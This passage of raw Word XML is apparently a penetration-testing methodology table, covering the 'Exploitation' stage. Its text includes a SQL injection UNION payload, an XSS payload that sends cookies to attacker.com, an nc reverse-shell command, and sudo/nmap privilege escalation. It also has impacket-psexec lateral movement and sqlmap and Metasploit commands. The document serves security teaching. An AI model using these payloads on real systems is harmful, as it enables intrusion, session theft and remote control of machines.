          <w:p w14:paraId="006D9135" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="06684A64" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="69FA9147" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CA449E9" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55B4468F" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0003D0C4" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="724593FC" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3CAF531E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>3. Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2D146F5E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Each exploit is a custom endeavor based on years of exploiting edge cases and manual tweaking. Automation via tools like Metasploit or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SQLmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> is useful, but real value comes from deep understanding and manual exploitation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="040133A2" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Approach</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D267018" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Instead of relying solely on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SQLmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, sometimes manual injection with </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Burp Suite Repeater</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> reveals blind injection vulnerabilities. Advanced union attacks and database </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>footprinting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> help you evade common WAFs: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>id,username</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> FROM users WHERE id=1 UNION SELECT NULL,NULL,NULL#</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A722F0" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: You chain XSS vulnerabilities to steal cookies or impersonate users via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> theft with payloads like:  </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>html &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>img</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">="http://attacker.com?c=" + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54F3F8F9" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Command Injection</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Manually crafted payloads such as:  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>bash ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -e /bin/bash &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>attacker_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&gt; 4444</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  - </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Years of experience help you intuitively spot weak kernel versions for privilege escalation (e.g., </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dirty cow</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> exploit), and you can manually exploit </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SUID binaries</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> or misconfigured </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sudoers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">bash </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -l; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> --interactive</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA3539B" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>psexec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>pass-the-hash</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> techniques to pivot between machines in the internal network: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">bash </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>impacket-psexec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>administrator@target_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 'cmd.exe'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ACB3168" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Executed Commands</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70334349" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u "http://example.com/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>vuln.php?id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>=1" --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dbs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> --random-agent --risk=3 --level=5</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> –</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79A945EC" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -x 'use exploit/multi/http/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tomcat_mgr_login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Exploit known vulnerabilities like Apache Tomcat misconfigurations) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DEC590E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 -c 'import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>pty;pty</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.spawn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>("/bin/bash")'</w:t>
